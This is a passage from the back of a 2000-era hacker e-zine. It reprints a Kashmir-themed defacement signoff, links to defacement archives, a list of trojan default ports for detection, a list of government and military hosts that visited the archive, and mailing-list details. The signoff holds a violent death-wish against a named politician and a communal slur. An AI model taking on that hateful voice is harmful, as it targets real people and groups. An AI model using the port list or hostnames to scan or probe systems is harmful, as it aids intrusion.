X-ORG, etC!, GForce, Makaveli Crew, s|ider, sephz, indica, madsmurf, rigian, knight, norad, mo`, sn|per@undernet, heataz, Lycos, viviana, h1gh, the attrition.org team, The NEWS Daily, The HINDU - an alleged newspaper (yes we read the article *smoochies*), sharon stone, barnaby jones (or however it's spelt), Stuart the mouse, Johnny Bravo, the Indian Soldiers for selling guns to the freedom fighters, the Mujahideen, and all the people supporting the Kashmiri cause ! Fuck-Yous : The U.N. for sitting on their fat asses all this time and doing nothing, The U.S.A. for looking the other way while defenseless people are being butchered, Amnesty International for not doing their part, The Hindu "baniya", Bal Thakray - when you die (which IS going to be soon), we hope they let the vultures violate every friggin' hole your body has to offer before tearing you up, eating you piece by piece, digesting you and then taking a royal dump in the river ganges (YES! we are SICK terrorists !@#$%!), Jaswanth Singh - You give sikhs a bad BAD name dude, the pizza dude for being this late, one k0nka@dalnet for being whatever he is - k0nka mate.. here's looking at your sorry ass kid... _|_ , net21pk - the "alleged" ISP, and all the people we've missed - you know who you are guys, FUCK YOU !@ ... and now we must bid you all adieu, but this we promise .... we shall meet again ! Previous Works : Indian Science Congress 2000 ( Archived Here ) Zee Networks ( Archived Here ) :: [ m O s ] :: - Zor Ka Jhatka, Dheray Se Lagay ========================================================================== * Info supplied by the attrition.org mailing list. Cracked webpage archives (list from attrition) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/ http://www.hackernews.com/archive/crackarch.html http://www.freespeech.org/resistance/ http://www.rewted.org/cracked/ http://www.403-security.org/ http://www.projectgamma.com/defaced/ http://www.net-security.org/ http://www.netrus.net/users/beard/pages/hacks/ http://212.205.141.128/grhack/html/default_hacking.html http://194.226.45.195/hacked/hacked.html http://alldas.de/crkidx1.htm http://www.turkeynews.net/Hacked http://www.flashback.se/hack/ http://www.dutchthreat.org/ http://www.onething.com/archive/ http://www.2600.com/hacked_pages/ http://hysteria.sk/hacked/ http://erazor.vrnet.gr/ A simple yet elegant crack: http://careers.altavista.com/ Index of / Name Last modified Size Description Parent Directory 12-May-1999 18:09 - ALTAVISTA 05-Feb-2000 10:56 0k EATS 05-Feb-2000 10:56 0k SHIT 05-Feb-2000 10:56 0k Cracked sites listed oldest to most recent... and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ By: joakim.von.braun@risab.se Source: PSS Common Trojan ports to watch for: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After seeing several questions about traffic directed at ports as 31337 and 12345 I've put together a list of all trojans known to me and the default ports they are using. Of course several of them could use any port, but I hope this list will maybe give you a clue of what might be going on. port 21 - Blade Runner, Doly Trojan, Fore, Invisible FTP, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Shtrilitz Stealth, Terminator, WinPC, WinSpy port 31 - Hackers Paradise port 80 - Executor port 456 - Hackers Paradise port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Satanz Backdoor port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1245 - VooDoo Doll port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4590 - ICQTrojan port 5000 - Sockets de Troie port 5001 - Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5569 - Robo-Hack port 5742 - WinCrash port 6670 - DeepThroat port 6771 - DeepThroat port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack´99 KeyLogger port 12345 - GabanBus, NetBus port 12346 - GabanBus, NetBus port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 - Delta port 31337 - Back Orifice port 31338 - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 - Delta port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 61466 - Telecommando port 65000 - Devil You'll find the list on the following address: http://www.simovits.com/nyheter9902.html (still in Swedish but it will be translated in the near future). To help anyone to detect trojan attacks, I´m planning to add information about the original names of the executables, their size, where they usually are hiding, and the names of any helpfiles they may use. I will also add tools or links to tools that may be of your assistance. Feel free to get back to me with any comments or suggestions. If you find new trojans I´ll love to get my hands on them, but please mail me first, as I don´t need more than one copy. If you have live experiance of trojan attacks I´m interested to read about your findings. Joakim joakim.von.braun@risab.se A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp ** NEW ** http://datatwirl.intranova.net ** NEW ** http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ ** NEW ** http://net-security.org/hwahaxornews ** NEW ** http://www.sysbreakers.com/hwa ** NEW ** http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.hackunlimited.com/zine/hwa/ *UPDATED* http://www.ducktank.net/hwa/issues.html. ** NEW ** http://www.alldas.de/hwaidx1.htm ** NEW ** http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa.*DOWN* http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ http://hwa.hax0r.news.8m.com/ http://www.fortunecity.com/skyscraper/feature/103/ International links:(TBC) ~~~~~~~~~~~~~~~~~~~~~~~~~ Foreign correspondants and others please send in news site links that have security news from foreign countries for inclusion in this list thanks... - Ed Belgium.......: http://securax.org/cum/ *New address* Brasil........: http://www.psynet.net/ka0z http://www.elementais.cjb.net Canada .......: http://www.hackcanada.com Croatia.......: http://security.monitor.hr Colombia......: http://www.cascabel.8m.com http://www.intrusos.cjb.net Finland ........http://hackunlimited.com/ Germany ........http://www.alldas.de/ http://www.security-news.com/ Indonesia.....: http://www.k-elektronik.org/index2.html http://members.xoom.com/neblonica/ http://hackerlink.or.id/ Netherlands...: http://security.pine.nl/ Russia........: http://www.tsu.ru/~eugene/ Singapore.....: http://www.icepoint.com South Africa ...http://www.hackers.co.za http://www.hack.co.za ** Due to excessive network attacks this site is now being mirrored at http://www.siliconinc.net/hack/ http://www.posthuman.za.net Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first and best security related e-zine. .za (South Africa) sites contributed by wyzwun tnx guy... Got a link for this section? email it to hwa@press.usmc.net and i'll review it and post it here if it merits it. @HWA A.2 Hot Hits ~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= Today the spotlight may be on you, some interesting machines that have accessed these archives recently... _ _ _ | | | | ___ | |_ | |_| |/ _ \| __| | _ | (_) | |_ |_| |_|\___/ \__| _ _ _ _ | | | (_) | | |__| |_| |_ ___ | __ | | __/ __| | | | | | |_\__ \ |_| |_|_|\__|___/ .gov and .mil activity fitzgerald.ags.bnl.gov zephyr1.pnl.gov ihvideo.lewisham.gov.uk shihonage.gsfc.nasa.gov burnia.dmz.health.nsw.gov.au ococ.oc.ca.gov guardian.gov.sg aragorn.dpa.act.gov.au ipaccess.gov.ru eagle-ts222.korea.army.mil gate1.noc.usmc.mil eagle-ts209.korea.army.mil proxy.vandenberg.af.mil lax.dcmdw.dla.mil beowulf.ramstein.af.mil cofcs71.aphis.usda.gov samds4.sam.pentagon.mil eg-016-045.eglin.af.mil pacfa.evepier.navy.mil obgate.hill.af.mil biglost.inel.gov marshall.state.gov flatline.arc.nasa.gov mars.istac.gov gateway1.osd.mil gateway3.osd.mil elan5172.cbcph.navy.mil proxy.gintic.gov.sg doegate.doe.gov sunspot.gsfc.nasa.gov gate1.mcbh.usmc.mil homer.nawcad.navy.mil maggie.nawcad.navy.mil lisa.nawcad.navy.mil msproxy.transcom.mil b-kahuna.hickam.af.mil sc034ws109.nosc.mil infosec.se gate2.mcbutler.usmc.mil sc034ws109.nosc.mil shq-ot-1178.nosc.mil dhcp-036190.scott.af.mil mcreed.lan.teale.ca.gov dodo.nist.gov mc1926.mcclellan.af.mil kwai11.nsf.gov enduser.faa.gov vasfw02,fdic.gov lisa.defcen.gov.au ps1.pbgc.gov guardian.gov.sg amccss229116.scott.af.mil sc022ws224.nosc.mil sheppard2.hurlburt.af.mil marshall.us-state.gov digger1.defence.gov.au firewall.mendoza.gov.ar ipaccess.gov.ru gatekeeper.itsec-debis.de fgoscs.itsec-debis.de fhu-ed4ccdf.fhu.disa.mil citspr.tyndall.af.mil kelsatx2.kelly.af.mil kane.sheppard.af.mil relay5.nima.mil host.198-76-34-33.gsa.gov ntsrvr.vsw.navy.mil saic2.nosc.mil wygate.wy.blm.gov mrwilson.lanl.gov p722ar.npt.nuwc.navy.mil ws088228.ramstein.af.mil car-gw.defence.gov.au unknown-c-23-147.latimes.com nytgate1.nytimes.com There are some interesting machines among these, the *.nosc.mil boxes are from SPAWAR information warfare centres, good Is It Worth It Followup to see our boys keeping up with the news... - Ed @HWA A.3 Mirror Sites List ~~~~~~~~~~~~~~~~~ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= __ __ _ | \/ (_)_ __ _ __ ___ _ __ ___ | |\/| | | '__| '__/ _ \| '__/ __| | | | | | | | | | (_) | | \__ \ |_| |_|_|_| |_| \___/|_| |___/ Some of these are not keeping up with new issues like they should be, you can always get the latest issue from www.csoft.net/~hwa or join us on IRC (EFnet) in channel #hwa.hax0r.news and check the topic or ask Cruciphux where the latest issues may be attained. I also upload all issues to etext.org, the zines are available thru their ftp service, updates are slow. - Ed New mirror sites *** http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp *** NEW *** *** http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/ *** http://datatwirl.intranova.net * NEW * http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://net-security.org/hwahaxornews http://www.attrition.org/hosted/hwa/ http://hwazine.cjb.net/ http://www.hackunlimited.com/files/secu/papers/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ * http://hwa.hax0r.news.8m.com/ * http://www.fortunecity.com/skyscraper/feature/103/ * Crappy free sites of no use to anyone. too lazy to kill em. *** Most likely to be up to date other than the main site. HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net thanks to airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! and p0lix for the (now expired) digitalgeeks archive tnx guys. http://www.csoft.net/~hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://blkops.venomous.net/hwa_hax0r_news/hwa_hax0r_news.asp http://the.wiretapped.net/security/textfiles/hWa.hax0r.news/ http://www.attrition.org/hosted/hwa/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.alldas.de/hwaidx1.htm ** NEW ** CHECK THIS ONE OUT ** http://www.csoft.net/~hwa/ http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://www.projectgamma.com/archives/zines/hwa/ http://www.403-security.org/Htmls/hwa.hax0r.news.htm @HWA A.4 The hacker's Ethic (90's Style) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ _ _ _ _ _____ _ _ _ | | | | __ _ ___| | _____ _ __( )__| ____| |_| |__ (_) ___ | |_| |/ _` |/ __| |/ / _ \ '__|/ __| _| | __| '_ \| |/ __| | _ | (_| | (__| < __/ | \__ \ |___| |_| | | | | (__ |_| |_|\__,_|\___|_|\_\___|_| |___/_____|\__|_| |_|_|\___| Sadly, due to the traditional ignorance and sensationalizing of the mass media, the once-noble term hacker has become a perjorative. Among true computer people, being called a hacker is a compliment. One of the traits of the true hacker is a profoundly antibureaucratic and democratic spirit. That spirit is best exemplified by the Hacker's Ethic. This ethic was best formulated by Steven Levy in his 1984 book Hackers: Heroes of the Computer Revolution. Its tenets are as follows: 1 - Access to computers should be unlimited and total. 2 - All information should be free. 3 - Mistrust authority - promote decentralization. 4 - Hackers should be judged by their hacking not bogus criteria such as degrees, age, race, or position. 5 - You create art and beauty on a computer, 6 - Computers can change your life for the better. The Internet as a whole reflects this ethic. @HWA A.5 Sources *** (VERY incomplete) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ / ___| ___ _ _ _ __ ___ ___ ___ \___ \ / _ \| | | | '__/ __/ _ Y __| ___) | (_) | |_| | | | (_| __|__ \ |____/ \___/ \__,_|_| \___\___|___/ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News site.........................http://www.ukhackers.com/ *NEW* News site.........................http://www.hackernews.com.br/ *NEW* News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ *News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ .(lophtcrack)..http://www.l0pht.com/ NewsTrolls .(daily news ).........http://www.newstrolls.com/ General Security/Exploits.........http://packetstorm.securify.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ s News/Humour site+ ................http://www.innerpulse.com News/Techie news site.............http://www.slashdot.org * HNN Also archives back issues of their news, use the following url format http://www.hackernews.com/arch.html?012700 where 01=Jan 27=Date 00=Year. They are archived here also as part of the compilation and broad archival concept we are trying to maintain with this publication. - Ed +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq win2kbugtraq <+others> @HWA A.6 Resources ~~~~~~~~~ ___ | _ \___ ______ _ _ _ _ __ ___ ___ | / -_|_-< _ \ || | '_/ _/ -_|_-< |_|_\___/__|___/\_,_|_| \__\___/__/ NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ PLEASE if you have any changes or additions for this section please mail them to cruciphux@dok.org. Thank you. http://www.newsnow.co.uk/-NewsFeed.Tech.htm *NEW* from Tep http://www.cnn.com/SEARCH/ http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack http://www.ottawacitizen.com/business/ http://search.yahoo.com.sg/search/news_sg?p=hack http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack http://www.zdnet.com/zdtv/cybercrime/ http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm http://freespeech.org/eua/ Electronic Underground Affiliation http://ech0.cjb.net ech0 Security http://axon.jccc.net/hir/ Hackers Information Report http://net-security.org Net Security http://www.403-security.org Daily news and security related site http://www.hack.co.za/ Current exploits archive ** Due to excessive network attacks this site is now being mirrored at http://www.siliconinc.net/hack/ Please send in links that you think should belong here to keep this section up to date, it is overdue updating!. A.7 Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ ____ _ _ _ / ___| _ _| |__ _ __ ___ (_)___ ___(_) ___ _ __ ___ \___ \| | | | '_ \| '_ ` _ \| / __/ __| |/ _ \| '_ \/ __| ___) | |_| | |_) | | | | | | \__ \__ \ | (_) | | | \__ \ |____/ \__,_|_.__/|_| |_| |_|_|___/___/_|\___/|_| |_|___/ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed A.8 Mailing list Info ~~~~~~~~~~~~~~~~~ Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html ATTRITION.ORG's Website defacement mirror and announcement lists ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.attrition.org/mirror/attrition/ http://www.attrition.org/security/lists.html -- defaced [web page defacement announce list] This is a public LOW VOLUME (1) mail list to circulate news/info on defaced web sites. To subscribe to Defaced, send mail to majordomo@attrition.org with "subscribe defaced" in the BODY of the mail. There will be two types of posts to this list: 1. brief announcements as we learn of a web defacement. this will include the site, date, and who signed the hack. we will also include a URL of a mirror of the hack. 2. at the end of the day, a summary will be posted of all the hacks of the day. these can be found on the mirror site listed under 'relevant links' This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: mcintyre@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ (1) It is low volume on a normal day. On days of many defacements, traffic may be increased. On a few days, it is a virtual mail flood. You have been warned. ;) -=- -- defaced summary [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced domains on a given day. To subscribe to Defaced-Summary, send mail to majordomo@attrition.org with "subscribe defaced-summary" in the BODY of the mail. There will be ONE type of post to this list: 1. a single nightly piece of mail listing all reported domains. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- defaced GM [web page defacement announce list] This is a low traffic mail list to announce all publicly defaced government and military domains on a given day. To subscribe to Defaced-GM, send mail to majordomo@attrition.org with "subscribe defaced-gm" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -- defaced alpha [web page defacement announce list] This is a low traffic mail list to announce via alpha-numeric pagers, all publicly defaced government and military domains on a given day. To subscribe to Defaced-Alpha, send mail to majordomo@attrition.org with "subscribe defaced-alpha" in the BODY of the mail. There will be ONE type of post to this list: 1. sporadic pieces of mail for each government (.gov) or military (.mil) system defaced. the information will only include domain names. the same information can be found on http://www.attrition.org/mirror/attrition/ via sporadic updates. This list is designed primarily for government and military personell charged with tracking security incidents on government run networks. Further, it is designed for quick response and aimed at law enforcement agencies like DCIS and the FBI. To subscribe to this list, a special mail will be sent to YOUR alpha-numeric pager. A specific response must be made within 12 hours of receiving the mail to be subscribed. If the response is not received, it is assumed the mail was not sent to your pager. This list is for informational purposes only. Subscribing denotes your acceptance of the following: 1. we have nothing to do with the hacks. at all. 2. we are only mirroring the work of OTHER people. 3. we can not be held liable for anything related to these hacks. 4. all of the points on the disclaimer listed below. Under no circumstances may the information on this list be used to solicit security business. You do not have permission to forward this mail to anyone related to the domain that was defaced. enjoy. List maintainer: jericho@attrition.org Hosted by: majordomo@attrition.org Relevant Links: Disclaimer: http://www.attrition.org/mirror/attrition/notes.html ATTRITION Mirror: http://www.attrition.org/mirror/ -=- THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin <chasin@crimelab.com>. To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I am pleased to inform you of several changes that will be occurring on June 5th. I hope you find them as exciting as I do. BUGTRAQ moves to a new home --------------------------- First, BUGTRAQ will be moving from its current home at NETSPACE.ORG to SECURITYFOCUS.COM. What is Security Focus you ask? Wait and read below. Other than the change of domains nothing of how the list is run changes. I am still the moderator. We play by the same rules. Security Focus will be providing mail archives for BUGTRAQ. The archives go back longer than Netspace's and are more complete than Geek-Girl's. The move will occur one week from today. You will not need to resubscribe. All your information, including subscription options will be moved transparently. Any of you using mail filters (e.g. procmail) to sort incoming mail into mail folders by examining the From address will have to update them to include the new address. The new address will be: BUGTRAQ@SECURITYFOCUS.COM Security Focus also be providing a free searchable vulnerability database. BUGTRAQ es muy bueno -------------------- It has also become apparent that there is a need for forums in the spirit of BUGTRAQ where non-English speaking people or people that don't feel comfortable speaking English can exchange information. As such I've decided to give BUGTRAQ in other languages a try. BUGTRAQ will continue to be the place to submit vulnerability information, but if you feel more comfortable using some other language you can give the other lists a try. All relevant information from the other lists which have not already been covered here will be translated and forwarded on by the list moderator. In the next couple of weeks we will be introducing BUGTRAQ-JP (Japanese) which will be moderated by Nobuo Miwa <n-miwa@lac.co.jp> and BUGTRAQ-SP (Spanish) which will be moderated by CORE SDI S.A. from Argentina <http://www.core-sdi.com/> (the folks that brought you Secure Syslog and the SSH insertion attack). What is Security Focus? ----------------------- Security Focus is an exercise in creating a community and a security resource. We hope to be able to provide a medium where useful and successful resources such as BUGTRAQ can occur, while at the same time providing a comprehensive source of security information. Aside from moving just BUGTRAQ over, the Geek-Girl archives (and the Geek Girl herself!) have moved over to Security Focus to help us with building this new community. The other staff at Security Focus are largely derived from long time supporters of Bugtraq and the community in general. If you are interested in viewing the staff pages, please see the 'About' section on www.securityfocus.com. On the community creating front you will find a set of forums and mailing lists we hope you will find useful. A number of them are not scheduled to start for several weeks but starting today the following list is available: * Incidents' Mailing List. BUGTRAQ has always been about the discussion of new vulnerabilities. As such I normally don't approve messages about break-ins, trojans, viruses, etc with the exception of wide spread cases (Melissa, ADM worm, etc). The other choice people are usually left with is email CERT but this fails to communicate this important information to other that may be potentially affected. The Incidents mailing list is a lightly moderated mailing list to facilitate the quick exchange of security incident information. Topical items include such things as information about rootkits new trojan horses and viruses, source of attacks and tell-tale signs of intrusions. To subscribe email LISTSERV@SECURITYFOCUS.COM with a message body of: SUBS INCIDENTS FirstName, LastName Shortly we'll also be introducing an Information Warfare forum along with ten other forums over the next two months. These forums will be built and moderated by people in the community as well as vendors who are willing to take part in the community building process. *Note to the vendors here* We have several security vendors who have agreed to run forums where they can participate in the online communities. If you would like to take part as well, mail Alfred Huger, ahuger@securityfocus.com. On the information resource front you find a large database of the following: * Vulnerabilities. We are making accessible a free vulnerability database. You can search it by vendor, product and keyword. You will find detailed information on the vulnerability and how to fix it, as well are links to reference information such as email messages, advisories and web pages. You can search by vendor, product and keywords. The database itself is the result of culling through 5 years of BUGTRAQ plus countless other lists and news groups. It's a shining example of how thorough full disclosure has made a significant impact on the industry over the last half decade. * Products. An incredible number of categorized security products from over two hundred different vendors. * Services. A large and focused directory of security services offered by vendors. * Books, Papers and Articles. A vast number of categorized security related books, papers and articles. Available to download directly for our servers when possible. * Tools. A large array of free security tools. Categorized and available for download. * News: A vast number of security news articles going all the way back to 1995. * Security Resources: A directory to other security resources on the net. As well as many other things such as an event calendar. For your convenience the home-page can be personalized to display only information you may be interested in. You can filter by categories, keywords and operating systems, as well as configure how much data to display. I'd like to thank the fine folks at NETSPACE for hosting the site for as long as they have. Their services have been invaluable. I hope you find these changes for the best and the new services useful. I invite you to visit http://www.securityfocus.com/ and check it out for yourself. If you have any comments or suggestions please feel free to contact me at this address or at aleph1@securityfocus.com. Cheers. -- Aleph One / aleph1@underground.org http://underground.org/ KeyID 1024/948FD6B5 Fingerprint EE C9 E8 AA CB AF 09 61 8C 39 EA 47 A8 6A B8 01 Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com. To unsubscribe, visit http://www.counterpane.com/unsubform.html. Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier. Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms. He served on the board of the International Association for Cryptologic Research, EPIC, and VTW. He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest Sun 14 Feb, 1999 Volume 11 : Issue 09 ISSN 1004-042X Editor: Jim Thomas (cudigest@sun.soci.niu.edu) News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) Archivist: Brendan Kehoe Poof Reader: Etaion Shrdlu, Jr. Shadow-Archivists: Dan Carosone / Paul Southworth Ralph Sims / Jyrki Kuoppala Ian Dickinson Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed UPDATED Sept/99 - Sent in by Androthi, tnx for the update ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ --[ New ISN announcement (New!!) 